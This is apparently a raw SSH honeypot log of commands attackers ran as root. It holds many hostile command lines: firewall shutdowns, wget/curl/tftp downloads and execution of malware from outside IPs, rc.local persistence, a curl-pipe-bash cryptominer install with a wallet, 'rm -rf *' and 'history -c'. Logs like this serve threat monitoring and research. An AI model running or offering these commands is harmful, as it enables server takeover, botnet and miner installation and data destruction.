chmod +x *
./sshd
./krane 1

From 180.215.192.123 15-Jul-2021 02:09:39 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux.server;chmod 777 Linux.server;./Linux.server;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux.server
chmod 777 Linux.server
./Linux.server
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux.server;chmod 777 Linux.server;./Linux.server;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux.server
chmod 777 Linux.server
./Linux.server

From 179.43.176.112 15-Jul-2021 18:41:29 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.175.12/1a9zxq/meth.x86; cat meth.x86 > meth; chmod +x meth; chmod 777 *; ./meth rooted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.175.12/1a9zxq/meth.x86
cat meth.x86 > meth
chmod +x meth
chmod 777 *
./meth rooted
history -c

From 180.215.192.123 15-Jul-2021 21:37:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux2.4;chmod 777 Linux2.4;./Linux2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux2.4
chmod 777 Linux2.4
./Linux2.4
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux2.4;chmod 777 Linux2.4;./Linux2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux2.4
chmod 777 Linux2.4
./Linux2.4
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 107.189.3.205 15-Jul-2021 21:49:16 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec uname -a
uname -a

From 180.215.192.107 16-Jul-2021 00:05:28 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/KDLinux;chmod 777 KDLinux;./KDLinux;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/KDLinux
chmod 777 KDLinux
./KDLinux
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/KDLinux;chmod 777 KDLinux;./KDLinux;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/KDLinux
chmod 777 KDLinux
./KDLinux

From 180.215.192.107 16-Jul-2021 00:25:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/DDos;chmod 777 DDos;./DDos;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/DDos
chmod 777 DDos
./DDos
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/DDos;chmod 777 DDos;./DDos;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/DDos
chmod 777 DDos
./DDos

From 180.215.192.123 16-Jul-2021 03:24:40 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/99.6;chmod 777 99.6;./99.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/99.6
chmod 777 99.6
./99.6
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/99.6;chmod 777 99.6;./99.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/99.6
chmod 777 99.6
./99.6

From 180.215.192.123 16-Jul-2021 11:52:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/qq;chmod 777 qq;./qq;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/qq
chmod 777 qq
./qq

From 180.215.192.123 16-Jul-2021 12:00:16 ssh2 root
Exec  /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/qq;chmod 777 qq;./qq;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/qq
chmod 777 qq
./qq
Exec  /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/qq;chmod 777 qq;./qq;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/qq
chmod 777 qq
./qq

From 180.215.192.107 16-Jul-2021 23:58:58 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/M;chmod 777 M;./M;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/M
chmod 777 M
./M

From 180.215.192.107 17-Jul-2021 00:10:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/Q;chmod 777 Q;./Q;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/Q
chmod 777 Q
./Q
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/Q;chmod 777 Q;./Q;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/Q
chmod 777 Q
./Q

From 180.215.192.107 17-Jul-2021 00:18:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/L;chmod 777 L;./L;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/L
chmod 777 L
./L
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/L;chmod 777 L;./L;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/L
chmod 777 L
./L

From 180.215.192.107 17-Jul-2021 00:33:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/E;chmod 777 E;./E;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/E
chmod 777 E
./E

From 209.141.53.60 17-Jul-2021 01:41:16 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 222.186.133.167 17-Jul-2021 07:14:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsnd;chmod 777 wsnd;./wsnd;echo "cd /tmp/">>/etc/rc.local;echo "./wsnd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsnd
chmod 777 wsnd
./wsnd
echo "cd /tmp/">>/etc/rc.local
echo "./wsnd
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.4.243.18 18-Jul-2021 17:32:38 ssh2 root
Exec echo -n bSkjDm2w|md5sum
echo -n bSkjDm2w|md5sum

From 117.24.13.169 19-Jul-2021 06:24:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/fgh;chmod 777 fgh;./fgh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/fgh
chmod 777 fgh
./fgh
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/fgh;chmod 777 fgh;./fgh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/fgh
chmod 777 fgh
./fgh

From 117.24.13.169 19-Jul-2021 07:32:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/aaa;chmod 777 aaa;./aaa;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/aaa
chmod 777 aaa
./aaa

From 117.24.13.169 19-Jul-2021 09:08:10 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/txma;chmod 777 txma;./txma
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/txma
chmod 777 txma
./txma

From 117.24.13.169 19-Jul-2021 09:29:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/txma;chmod 777 txma;./txma;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/txma
chmod 777 txma
./txma
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/txma;chmod 777 txma;./txma;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/txma
chmod 777 txma
./txma

From 117.24.13.169 19-Jul-2021 10:36:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f txma;wget http://1.117.4.172:999/txma;chmod 777 txma;./txma
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f txma
wget http://1.117.4.172:999/txma
chmod 777 txma
./txma

From 117.24.13.169 19-Jul-2021 10:38:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f txma;wget http://1.117.4.172:999/txma;chmod 777 txma;./txma
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f txma
wget http://1.117.4.172:999/txma
chmod 777 txma
./txma
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f txma;wget http://1.117.4.172:999/txma;chmod 777 txma;./txma
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f txma
wget http://1.117.4.172:999/txma
chmod 777 txma
./txma

From 117.24.13.169 19-Jul-2021 10:44:40 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f txma;wget http://1.117.4.172:999/txma666;chmod 777 txma666;./txma666
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f txma
wget http://1.117.4.172:999/txma666
chmod 777 txma666
./txma666
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f txma;wget http://1.117.4.172:999/txma666;chmod 777 txma666;./txma666
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f txma
wget http://1.117.4.172:999/txma666
chmod 777 txma666
./txma666

From 199.19.226.145 20-Jul-2021 07:55:04 ssh2 root
Exec cd /tmp; wget http://152.89.239.4/x86_64; chmod 777 *; ./x86_64 x86_wget; curl -O http://152.89.239.4/x86_64; chmod 777 *; ./x86_64 x86_curl
cd /tmp
wget http://152.89.239.4/x86_64
chmod 777 *
./x86_64 x86_wget
curl -O http://152.89.239.4/x86_64
chmod 777 *
./x86_64 x86_curl

From 179.43.176.112 21-Jul-2021 01:03:32 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.175.12/1a9zxq/meth.x86; cat meth.x86 > meth; chmod +x meth; chmod 777 *; ./meth rooted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.175.12/1a9zxq/meth.x86
cat meth.x86 > meth
chmod +x meth
chmod 777 *
./meth rooted
history -c

From 180.215.192.107 21-Jul-2021 02:46:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/C;chmod 777 C;./C;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/C
chmod 777 C
./C

From 180.215.192.107 21-Jul-2021 02:51:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/C;chmod 777 C;./C;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/C
chmod 777 C
./C
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/C;chmod 777 C;./C;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/C
chmod 777 C
./C

From 180.215.192.107 21-Jul-2021 02:57:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/ee;chmod 777 ee;./ee;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/ee
chmod 777 ee
./ee

From 209.141.53.60 21-Jul-2021 13:00:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 203.159.80.131 22-Jul-2021 13:51:44 ssh2 root
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a

From 180.215.192.107 22-Jul-2021 23:20:30 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.124.34.136/VIP;chmod 777 VIP;./VIP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.124.34.136/VIP
chmod 777 VIP
./VIP

From 222.186.133.167 23-Jul-2021 03:44:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsnd;chmod 777 wsnd;./wsnd;echo "cd /tmp/">>/etc/rc.local;echo "./wsnd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsnd
chmod 777 wsnd
./wsnd
echo "cd /tmp/">>/etc/rc.local
echo "./wsnd
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsnd;chmod 777 wsnd;./wsnd;echo "cd /tmp/">>/etc/rc.local;echo "./wsnd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsnd
chmod 777 wsnd
./wsnd
echo "cd /tmp/">>/etc/rc.local
echo "./wsnd
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 138.68.79.242 25-Jul-2021 11:25:22 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://167.172.111.114/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 167.172.111.114 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 167.172.111.114; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://167.172.111.114/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 167.172.111.114 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 167.172.111.114
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 209.141.56.41 26-Jul-2021 11:44:00 ssh2 root
Exec cat /etc/issue; apt update -y; yum update -y; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX; echo Gonna get ripped Hraztalag was here lel
cat /etc/issue
apt update -y
yum update -y
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX
echo Gonna get ripped Hraztalag was here lel

From 222.186.133.167 28-Jul-2021 02:11:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsnbb;chmod 777 wsnbb;./wsnbb;echo "cd /tmp/">>/etc/rc.local;echo "./wsnbb&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsnbb
chmod 777 wsnbb
./wsnbb
echo "cd /tmp/">>/etc/rc.local
echo "./wsnbb
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 209.141.56.41 29-Jul-2021 02:01:20 ssh2 root
Exec cat /etc/issue; apt update -y; yum update -y; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s; echo Gonna get ripped Hraztalag was here lel
cat /etc/issue
apt update -y
yum update -y
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
echo Gonna get ripped Hraztalag was here lel

From 199.19.226.145 29-Jul-2021 06:55:54 ssh2 root
Exec cd /tmp; wget http://152.89.239.4/x86_64; chmod 777 *; ./x86_64 x86_wget; curl -O http://152.89.239.4/x86_64; chmod 777 *; ./x86_64 x86_curl
cd /tmp
wget http://152.89.239.4/x86_64
chmod 777 *
./x86_64 x86_wget
curl -O http://152.89.239.4/x86_64
chmod 777 *
./x86_64 x86_curl

From 209.141.36.53 29-Jul-2021 16:11:15 ssh2 root
Exec cat /etc/issue; apt update -y; yum update -y; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
apt update -y
yum update -y
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
echo Gonna get ripped Hraztalag was here lel

From 164.90.165.44 30-Jul-2021 05:21:34 ssh2 root
Exec uname -s -v -n -r
uname -s -v -n -r

From 180.215.194.46 31-Jul-2021 09:02:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/xudp;chmod 777 xudp;./xudp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/xudp
chmod 777 xudp
./xudp
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/xudp;chmod 777 xudp;./xudp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/xudp
chmod 777 xudp
./xudp

From 180.215.194.46 31-Jul-2021 09:15:32 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/txma;chmod 777 txma;./txma;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/txma
chmod 777 txma
./txma

From 180.215.194.46 31-Jul-2021 09:41:24 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/dos64;chmod 777 dos64;./dos64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/dos64
chmod 777 dos64
./dos64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/dos64;chmod 777 dos64;./dos64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/dos64
chmod 777 dos64
./dos64

From 180.215.194.46 31-Jul-2021 09:49:40 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/dos32;chmod 777 dos32;./dos32;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/dos32
chmod 777 dos32
./dos32
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/dos32;chmod 777 dos32;./dos32;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/dos32
chmod 777 dos32
./dos32

From 185.132.251.20 31-Jul-2021 22:07:53 ssh2 root
ls

From 193.105.134.45 31-Jul-2021 23:08:25 ssh2 root
cd ..
ls
wget http
ls
vi ipcalc.pl

From 8.37.43.9 31-Jul-2021 23:19:44 ssh2 root
help
--help
cd root
--help
h
show
wget https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz
wget https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz
wget -O https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz
wget -U https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz

From 179.43.141.99 1-Aug-2021 00:47:14 ssh2 root
Exec cd /tmp; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s;
cd /tmp
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
pkill Xorg
pkill x86_64

From 77.244.216.110 1-Aug-2021 01:01:04 ssh2 root
Exec cat /etc/issue
cat /etc/issue
Exec cat /etc/issue
cat /etc/issue
Exec cat /etc/issue
cat /etc/issue

From 109.104.151.109 1-Aug-2021 10:00:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.104.151.112/multi/bins/bot.i586; curl -O http://109.104.151.112/multi/bins/bot.i586; chmod 777 bot.i586; chmod +x bot.i586; ./bot.i586 Exploit.x86; rm -rf bot.i586; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.151.112/multi/bins/bot.i586
